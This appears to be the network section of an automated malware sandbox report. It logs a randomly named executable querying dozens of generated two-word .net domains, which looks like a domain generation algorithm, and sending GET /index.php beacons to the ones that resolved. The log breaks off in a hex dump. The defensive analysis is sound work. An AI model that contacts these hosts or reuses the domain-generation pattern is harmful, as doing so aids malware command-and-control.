Aug 8, 2023 16:15:56.113485098 CEST	192.168.2.3	8.8.8.8	0xd20	Standard query (0)	membersuccess.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:56.149015903 CEST	192.168.2.3	8.8.8.8	0x9084	Standard query (0)	followbanker.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:56.191365004 CEST	192.168.2.3	8.8.8.8	0x29db	Standard query (0)	memberbanker.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:56.243444920 CEST	192.168.2.3	8.8.8.8	0xc9bd	Standard query (0)	beginfound.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:56.298916101 CEST	192.168.2.3	8.8.8.8	0xdaff	Standard query (0)	knownfound.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:56.326698065 CEST	192.168.2.3	8.8.8.8	0xbb5e	Standard query (0)	beginspring.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:56.360399961 CEST	192.168.2.3	8.8.8.8	0x6af5	Standard query (0)	knownspring.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:56.415662050 CEST	192.168.2.3	8.8.8.8	0xa096	Standard query (0)	beginsuccess.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:56.877264977 CEST	192.168.2.3	8.8.8.8	0xa5d5	Standard query (0)	knownsuccess.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:56.909451008 CEST	192.168.2.3	8.8.8.8	0x2e02	Standard query (0)	beginbanker.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:56.949096918 CEST	192.168.2.3	8.8.8.8	0x8dc6	Standard query (0)	knownbanker.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:56.976130009 CEST	192.168.2.3	8.8.8.8	0x43d7	Standard query (0)	summerfound.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:57.030236006 CEST	192.168.2.3	8.8.8.8	0x4509	Standard query (0)	crowdfound.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:57.072571039 CEST	192.168.2.3	8.8.8.8	0x6ff1	Standard query (0)	summerspring.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:57.136939049 CEST	192.168.2.3	8.8.8.8	0x7412	Standard query (0)	crowdspring.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:57.325943947 CEST	192.168.2.3	8.8.8.8	0x77a2	Standard query (0)	summersuccess.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:58.341809034 CEST	192.168.2.3	8.8.8.8	0x77a2	Standard query (0)	summersuccess.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:59.341006041 CEST	192.168.2.3	8.8.8.8	0x77a2	Standard query (0)	summersuccess.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:16:01.387918949 CEST	192.168.2.3	8.8.8.8	0x77a2	Standard query (0)	summersuccess.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:16:02.347645998 CEST	192.168.2.3	8.8.8.8	0xac19	Standard query (0)	crowdsuccess.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:16:02.525479078 CEST	192.168.2.3	8.8.8.8	0xaed7	Standard query (0)	summerbanker.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:16:02.566646099 CEST	192.168.2.3	8.8.8.8	0xeb63	Standard query (0)	crowdbanker.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:16:02.600152016 CEST	192.168.2.3	8.8.8.8	0xf06c	Standard query (0)	thoughtfound.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:16:02.651717901 CEST	192.168.2.3	8.8.8.8	0x74bc	Standard query (0)	waterfound.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:16:02.693319082 CEST	192.168.2.3	8.8.8.8	0x3ba1	Standard query (0)	thoughtspring.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:16:02.756421089 CEST	192.168.2.3	8.8.8.8	0x4e80	Standard query (0)	waterspring.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:16:02.788269997 CEST	192.168.2.3	8.8.8.8	0x6e51	Standard query (0)	thoughtsuccess.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:16:02.832012892 CEST	192.168.2.3	8.8.8.8	0xa3d5	Standard query (0)	watersuccess.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:16:02.859339952 CEST	192.168.2.3	8.8.8.8	0xc440	Standard query (0)	thoughtbanker.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:16:02.904510975 CEST	192.168.2.3	8.8.8.8	0x90a8	Standard query (0)	waterbanker.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:16:02.930903912 CEST	192.168.2.3	8.8.8.8	0x5bfb	Standard query (0)	womanfound.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:16:02.983391047 CEST	192.168.2.3	8.8.8.8	0xbffe	Standard query (0)	smokefound.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:16:03.011259079 CEST	192.168.2.3	8.8.8.8	0x24b1	Standard query (0)	womanspring.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:16:03.042972088 CEST	192.168.2.3	8.8.8.8	0x3db8	Standard query (0)	smokespring.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:16:03.087729931 CEST	192.168.2.3	8.8.8.8	0xbdc4	Standard query (0)	womansuccess.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:16:03.134289980 CEST	192.168.2.3	8.8.8.8	0x6e3a	Standard query (0)	smokesuccess.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:16:03.227195024 CEST	192.168.2.3	8.8.8.8	0x2362	Standard query (0)	womanbanker.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:16:03.453000069 CEST	192.168.2.3	8.8.8.8	0xea5a	Standard query (0)	smokebanker.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:16:03.494240999 CEST	192.168.2.3	8.8.8.8	0x8e09	Standard query (0)	partyfound.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:16:03.541039944 CEST	192.168.2.3	8.8.8.8	0x6780	Standard query (0)	fightfound.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:16:03.572645903 CEST	192.168.2.3	8.8.8.8	0x9a8b	Standard query (0)	partyspring.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 8, 2023 16:15:51.555947065 CEST	8.8.8.8	192.168.2.3	0xc2da	Name error (3)	summerbefore.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:51.607868910 CEST	8.8.8.8	192.168.2.3	0x9fdf	Name error (3)	crowdbefore.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:51.665695906 CEST	8.8.8.8	192.168.2.3	0x7cf4	Name error (3)	thoughtsettle.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:51.715017080 CEST	8.8.8.8	192.168.2.3	0xc93a	Name error (3)	watersettle.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:51.857624054 CEST	8.8.8.8	192.168.2.3	0x2d9e	No error (0)	thoughtlanguage.net		208.100.26.245	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:52.130357981 CEST	8.8.8.8	192.168.2.3	0x11c8	No error (0)	waterlanguage.net		185.230.63.171	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:52.130357981 CEST	8.8.8.8	192.168.2.3	0x11c8	No error (0)	waterlanguage.net		185.230.63.186	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:52.130357981 CEST	8.8.8.8	192.168.2.3	0x11c8	No error (0)	waterlanguage.net		185.230.63.107	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:52.257251024 CEST	8.8.8.8	192.168.2.3	0x1231	Name error (3)	thoughtdevice.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:52.319463968 CEST	8.8.8.8	192.168.2.3	0x4b1c	Name error (3)	waterdevice.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:52.362646103 CEST	8.8.8.8	192.168.2.3	0xe81b	Name error (3)	thoughtbefore.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:52.403712034 CEST	8.8.8.8	192.168.2.3	0x674e	Name error (3)	waterbefore.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:52.440176964 CEST	8.8.8.8	192.168.2.3	0x8f1b	Name error (3)	womansettle.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:52.522139072 CEST	8.8.8.8	192.168.2.3	0x287c	Name error (3)	smokesettle.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:52.583594084 CEST	8.8.8.8	192.168.2.3	0xcd9	Name error (3)	womanlanguage.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:52.636969090 CEST	8.8.8.8	192.168.2.3	0xfe84	Name error (3)	smokelanguage.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:52.717880011 CEST	8.8.8.8	192.168.2.3	0x59c3	Name error (3)	womandevice.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:52.776760101 CEST	8.8.8.8	192.168.2.3	0xa6b7	Name error (3)	smokedevice.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:52.828730106 CEST	8.8.8.8	192.168.2.3	0x74	Name error (3)	womanbefore.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:52.869612932 CEST	8.8.8.8	192.168.2.3	0x8e6c	Name error (3)	smokebefore.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:52.911057949 CEST	8.8.8.8	192.168.2.3	0xa335	Name error (3)	partysettle.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:52.942621946 CEST	8.8.8.8	192.168.2.3	0xede3	Name error (3)	fightsettle.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:52.968308926 CEST	8.8.8.8	192.168.2.3	0x118b	Name error (3)	partylanguage.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:53.003266096 CEST	8.8.8.8	192.168.2.3	0x4fe6	Name error (3)	fightlanguage.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:53.036926985 CEST	8.8.8.8	192.168.2.3	0x475d	Name error (3)	partydevice.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:53.098716974 CEST	8.8.8.8	192.168.2.3	0x9559	Name error (3)	fightdevice.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:53.236378908 CEST	8.8.8.8	192.168.2.3	0x6f24	No error (0)	partybefore.net		72.26.218.86	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:53.515518904 CEST	8.8.8.8	192.168.2.3	0xd1c6	Name error (3)	fightbefore.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:53.546859980 CEST	8.8.8.8	192.168.2.3	0x98d3	Name error (3)	freshfound.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:53.577574968 CEST	8.8.8.8	192.168.2.3	0xe83c	Name error (3)	experiencefound.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:53.619683027 CEST	8.8.8.8	192.168.2.3	0xccfc	No error (0)	freshspring.net		52.219.109.72	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:53.619683027 CEST	8.8.8.8	192.168.2.3	0xccfc	No error (0)	freshspring.net		52.219.108.168	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:53.619683027 CEST	8.8.8.8	192.168.2.3	0xccfc	No error (0)	freshspring.net		52.219.107.56	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:53.619683027 CEST	8.8.8.8	192.168.2.3	0xccfc	No error (0)	freshspring.net		52.219.92.216	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:53.619683027 CEST	8.8.8.8	192.168.2.3	0xccfc	No error (0)	freshspring.net		52.219.110.112	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:53.619683027 CEST	8.8.8.8	192.168.2.3	0xccfc	No error (0)	freshspring.net		52.219.80.123	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:53.619683027 CEST	8.8.8.8	192.168.2.3	0xccfc	No error (0)	freshspring.net		52.219.94.152	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:53.619683027 CEST	8.8.8.8	192.168.2.3	0xccfc	No error (0)	freshspring.net		52.219.176.144	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:53.965981960 CEST	8.8.8.8	192.168.2.3	0xf58b	Name error (3)	experiencespring.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:54.020545006 CEST	8.8.8.8	192.168.2.3	0x67e7	Name error (3)	freshsuccess.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:54.264472008 CEST	8.8.8.8	192.168.2.3	0x7fb9	No error (0)	experiencesuccess.net		69.194.230.123	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:54.616844893 CEST	8.8.8.8	192.168.2.3	0x3ab9	Name error (3)	freshbanker.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:54.643816948 CEST	8.8.8.8	192.168.2.3	0x17d6	Name error (3)	experiencebanker.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:54.696877003 CEST	8.8.8.8	192.168.2.3	0xeec1	Name error (3)	gentlemanfound.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:54.740170956 CEST	8.8.8.8	192.168.2.3	0x56bb	Name error (3)	alreadyfound.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:54.787837029 CEST	8.8.8.8	192.168.2.3	0xee10	Name error (3)	gentlemanspring.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:54.830658913 CEST	8.8.8.8	192.168.2.3	0x8fc0	Name error (3)	alreadyspring.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:54.874140024 CEST	8.8.8.8	192.168.2.3	0x5fa8	Name error (3)	gentlemansuccess.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:54.909506083 CEST	8.8.8.8	192.168.2.3	0x682	Name error (3)	alreadysuccess.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:54.952938080 CEST	8.8.8.8	192.168.2.3	0xc187	Name error (3)	gentlemanbanker.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:55.014853001 CEST	8.8.8.8	192.168.2.3	0xf50e	Name error (3)	alreadybanker.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:55.055850983 CEST	8.8.8.8	192.168.2.3	0x89aa	Name error (3)	followfound.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:55.113029957 CEST	8.8.8.8	192.168.2.3	0x63bc	Name error (3)	memberfound.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:55.175005913 CEST	8.8.8.8	192.168.2.3	0xc41c	Name error (3)	followspring.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:55.228537083 CEST	8.8.8.8	192.168.2.3	0xc59	Name error (3)	memberspring.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:55.728142023 CEST	8.8.8.8	192.168.2.3	0xa3dd	No error (0)	followsuccess.net		72.1.32.168	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:55.728142023 CEST	8.8.8.8	192.168.2.3	0xa3dd	No error (0)	followsuccess.net		34.224.160.149	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:56.145334959 CEST	8.8.8.8	192.168.2.3	0xd20	Name error (3)	membersuccess.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:56.183635950 CEST	8.8.8.8	192.168.2.3	0x9084	Name error (3)	followbanker.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:56.232557058 CEST	8.8.8.8	192.168.2.3	0x29db	Name error (3)	memberbanker.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:56.293519020 CEST	8.8.8.8	192.168.2.3	0xc9bd	Name error (3)	beginfound.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:56.321811914 CEST	8.8.8.8	192.168.2.3	0xdaff	Name error (3)	knownfound.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:56.355609894 CEST	8.8.8.8	192.168.2.3	0xbb5e	Name error (3)	beginspring.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:56.410767078 CEST	8.8.8.8	192.168.2.3	0x6af5	Name error (3)	knownspring.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:56.447968006 CEST	8.8.8.8	192.168.2.3	0xa096	No error (0)	beginsuccess.net		34.102.136.180	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:56.905010939 CEST	8.8.8.8	192.168.2.3	0xa5d5	Name error (3)	knownsuccess.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:56.945487976 CEST	8.8.8.8	192.168.2.3	0x2e02	Name error (3)	beginbanker.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:56.971369982 CEST	8.8.8.8	192.168.2.3	0x8dc6	Name error (3)	knownbanker.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:57.025574923 CEST	8.8.8.8	192.168.2.3	0x43d7	Name error (3)	summerfound.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:57.063654900 CEST	8.8.8.8	192.168.2.3	0x4509	Name error (3)	crowdfound.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:57.115611076 CEST	8.8.8.8	192.168.2.3	0x6ff1	Name error (3)	summerspring.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:57.177509069 CEST	8.8.8.8	192.168.2.3	0x7412	No error (0)	crowdspring.net		34.102.136.180	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:16:02.342370033 CEST	8.8.8.8	192.168.2.3	0x77a2	Server failure (2)	summersuccess.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:16:02.380729914 CEST	8.8.8.8	192.168.2.3	0xac19	No error (0)	crowdsuccess.net		34.102.136.180	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:16:02.561981916 CEST	8.8.8.8	192.168.2.3	0xaed7	Name error (3)	summerbanker.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:16:02.594501972 CEST	8.8.8.8	192.168.2.3	0xeb63	Name error (3)	crowdbanker.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:16:02.635852098 CEST	8.8.8.8	192.168.2.3	0xf06c	Name error (3)	thoughtfound.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:16:02.688293934 CEST	8.8.8.8	192.168.2.3	0x74bc	Name error (3)	waterfound.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:16:02.752161980 CEST	8.8.8.8	192.168.2.3	0x3ba1	Name error (3)	thoughtspring.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:16:02.784018040 CEST	8.8.8.8	192.168.2.3	0x4e80	Name error (3)	waterspring.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:16:02.827753067 CEST	8.8.8.8	192.168.2.3	0x6e51	Name error (3)	thoughtsuccess.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:16:02.855041981 CEST	8.8.8.8	192.168.2.3	0xa3d5	Name error (3)	watersuccess.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:16:02.900141954 CEST	8.8.8.8	192.168.2.3	0xc440	Name error (3)	thoughtbanker.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:16:02.926839113 CEST	8.8.8.8	192.168.2.3	0x90a8	Name error (3)	waterbanker.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:16:02.958982944 CEST	8.8.8.8	192.168.2.3	0x5bfb	Name error (3)	womanfound.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:16:03.007107019 CEST	8.8.8.8	192.168.2.3	0xbffe	Name error (3)	smokefound.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:16:03.038562059 CEST	8.8.8.8	192.168.2.3	0x24b1	Name error (3)	womanspring.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:16:03.081995964 CEST	8.8.8.8	192.168.2.3	0x3db8	Name error (3)	smokespring.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:16:03.130136013 CEST	8.8.8.8	192.168.2.3	0xbdc4	Name error (3)	womansuccess.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:16:03.192182064 CEST	8.8.8.8	192.168.2.3	0x6e3a	Name error (3)	smokesuccess.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:16:03.264305115 CEST	8.8.8.8	192.168.2.3	0x2362	Name error (3)	womanbanker.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:16:03.357614040 CEST	8.8.8.8	192.168.2.3	0x77a2	Server failure (2)	summersuccess.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:16:03.489087105 CEST	8.8.8.8	192.168.2.3	0xea5a	Name error (3)	smokebanker.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:16:03.536451101 CEST	8.8.8.8	192.168.2.3	0x8e09	Name error (3)	partyfound.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:16:03.568171978 CEST	8.8.8.8	192.168.2.3	0x6780	Name error (3)	fightfound.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:16:03.622056007 CEST	8.8.8.8	192.168.2.3	0x9a8b	Name error (3)	partyspring.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:16:04.357141972 CEST	8.8.8.8	192.168.2.3	0x77a2	Server failure (2)	summersuccess.net	none	none	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:16:06.403779984 CEST	8.8.8.8	192.168.2.3	0x77a2	Server failure (2)	summersuccess.net	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

thoughtlanguage.net

waterlanguage.net

partybefore.net

freshspring.net

experiencesuccess.net

followsuccess.net

beginsuccess.net

crowdspring.net

crowdsuccess.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49700	208.100.26.245	80	C:\helrrxxyrxmppnn\aoxsaykytfn.exe

Timestamp	kBytes transferred	Direction	Data
Aug 8, 2023 16:15:51.978521109 CEST	90	OUT	GET /index.php HTTP/1.0 Accept: / Connection: close Host: thoughtlanguage.net
Aug 8, 2023 16:15:52.096251011 CEST	91	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Tue, 08 Aug 2023 14:15:52 GMT Content-Type: text/html Content-Length: 178 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49701	185.230.63.171	80	C:\helrrxxyrxmppnn\aoxsaykytfn.exe

Timestamp	kBytes transferred	Direction	Data
Aug 8, 2023 16:15:52.173530102 CEST	92	OUT	GET /index.php HTTP/1.0 Accept: / Connection: close Host: waterlanguage.net
Aug 8, 2023 16:15:52.215102911 CEST	92	IN	HTTP/1.0 429 Too Many Requests Connection: close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49702	72.26.218.86	80	C:\helrrxxyrxmppnn\aoxsaykytfn.exe

Timestamp	kBytes transferred	Direction	Data
Aug 8, 2023 16:15:53.362957954 CEST	96	OUT	GET /index.php HTTP/1.0 Accept: / Connection: close Host: partybefore.net
Aug 8, 2023 16:15:53.474986076 CEST	97	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 08 Aug 2023 14:15:53 GMT Content-Type: text/html Connection: close Set-Cookie: btst=cd47010474e4f58c1e1c0777c00d6e33\|84.17.52.38\|1691504153\|1691504153\|0\|1\|0; path=/; domain=.partybefore.net; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=84.17.52.38; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49703	52.219.109.72	80	C:\helrrxxyrxmppnn\aoxsaykytfn.exe

Timestamp	kBytes transferred	Direction	Data
Aug 8, 2023 16:15:53.747670889 CEST	98	OUT	GET /index.php HTTP/1.0 Accept: / Connection: close Host: freshspring.net
Aug 8, 2023 16:15:53.904102087 CEST	99	IN	HTTP/1.1 404 Not Found Last-Modified: Wed, 02 Feb 2022 03:28:10 GMT ETag: "f8da68bd342b339f1128b5e6be0473ba" x-amz-error-code: NoSuchKey x-amz-error-message: The specified key does not exist. x-amz-error-detail-Key: index.php x-amz-request-id: FSAP3QC4W8HQD66A x-amz-id-2: 1Yg/H5xumuswZtjgM7VPuOjNfApdHHBEqYE4fOm0mo2bykruzDJ0L8/UnbbR6+RvFs43yTsAIsY= Content-Type: text/html Date: Tue, 08 Aug 2023 14:15:53 GMT Server: AmazonS3 Content-Length: 64 Connection: close
Aug 8, 2023 16:15:53.904122114 CEST	99	IN	Data Raw: 3c 70 3e 75 68 20 75 68 2c 20 74 68 65 72 65 20 77 61 73 20 61 6e 20 65 72 72 6f 72 21 21 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 3c 2f 70 3e Data Ascii: <p>uh uh, there was an error!!</p><p>Please try again later</p>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49704	69.194.230.123	80	C:\helrrxxyrxmppnn\aoxsaykytfn.exe

Timestamp	kBytes transferred	Direction	Data
Aug 8, 2023 16:15:54.433032036 CEST	100	OUT	GET /index.php HTTP/1.0 Accept: / Connection: close Host: experiencesuccess.net
Aug 8, 2023 16:15:54.584884882 CEST	101	IN	HTTP/1.1 404 Not Found Date: Tue, 08 Aug 2023 14:15:54 GMT Server: Apache Last-Modified: Sat, 07 Jan 2023 17:30:16 GMT Accept-Ranges: bytes Content-Length: 431 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 33 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 62 72 20 2f 3e 0a 3c 62 72 20 2f 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 65 62 75 7a 6f 2e 63 6f 6d 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 6f 66 74 61 63 75 6c 6f 75 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 77 65 62 75 7a 6f 2e 67 69 66 22 20 2f 3e 3c 2f 61 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 34 30 34 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 